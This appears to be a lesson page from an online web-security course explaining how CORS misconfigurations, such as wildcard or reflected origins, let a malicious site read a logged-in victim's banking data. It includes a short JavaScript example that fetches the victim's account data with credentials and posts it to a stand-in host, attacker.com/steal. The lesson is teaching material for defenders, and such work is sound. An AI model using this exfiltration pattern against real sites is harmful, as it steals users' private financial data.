Notice: This page requires JavaScript to function properly.
Please enable JavaScript in your browser settings or update your browser.Lernen Real-World CORS Attack Scenarios | CORS Security Risks and Real-World Scenarios
CORS Internals and Security

Real-World CORS Attack Scenarios

Swipe um das Menü anzuzeigen

Understanding how CORS can be exploited is essential for anyone responsible for web security. Attackers often look for sites with CORS misconfigurations, which can create dangerous attack vectors. These vulnerabilities allow malicious sites to interact with protected resources, bypassing the same-origin policy that browsers enforce by default. When a server trusts the wrong origins or uses overly permissive settings, attackers can leverage these weaknesses to perform actions or access data as if they were legitimate users.

Consider a scenario where a popular banking website incorrectly configures its CORS policy by allowing all origins using the wildcard "*" or by reflecting the Origin header in its response. An attacker creates a malicious website designed to lure users who are currently logged in to the bank. When a victim visits the attacker's site, hidden JavaScript code sends a cross-origin request to the bank's API endpoint that returns sensitive account information. Because of the misconfigured CORS headers, the browser allows the attacker's JavaScript to read the response, exposing confidential user data such as account balances or transaction history. This type of vulnerability can have severe consequences, including identity theft or financial loss.

// Malicious site JavaScript exploiting vulnerable CORS configuration
fetch("https://vulnerable-bank.com/api/account", {
  credentials: "include"
})
  .then(response => response.json())
  .then(data => {
    // Attacker steals sensitive account data
    fetch("https://attacker.com/steal", {
      method: "POST",
      body: JSON.stringify(data),
      headers: { "Content-Type": "application/json" }
    });
  });

In the attack example above, the attacker’s site sends a fetch request to the bank’s API while the victim is logged in. The credentials: "include" option ensures that the victim’s authentication cookies are sent with the request. If the bank’s server responds with CORS headers that allow the attacker's origin or use a wildcard, the browser grants the JavaScript access to the sensitive data in the response. The attacker’s script then forwards this data to their own server. The exploited weakness here is the server’s failure to restrict allowed origins, enabling unauthorized cross-origin access to private information.

question mark

What can an attacker achieve with a CORS misconfiguration?

Wählen Sie die richtige Antwort aus

War alles klar?

Wie können wir es verbessern?

Danke für Ihr Feedback!

Abschnitt 3. Kapitel 2

Fragen Sie AI

expand

Fragen Sie AI

ChatGPT

Fragen Sie alles oder probieren Sie eine der vorgeschlagenen Fragen, um unser Gespräch zu beginnen

Abschnitt 3. Kapitel 2
some-alt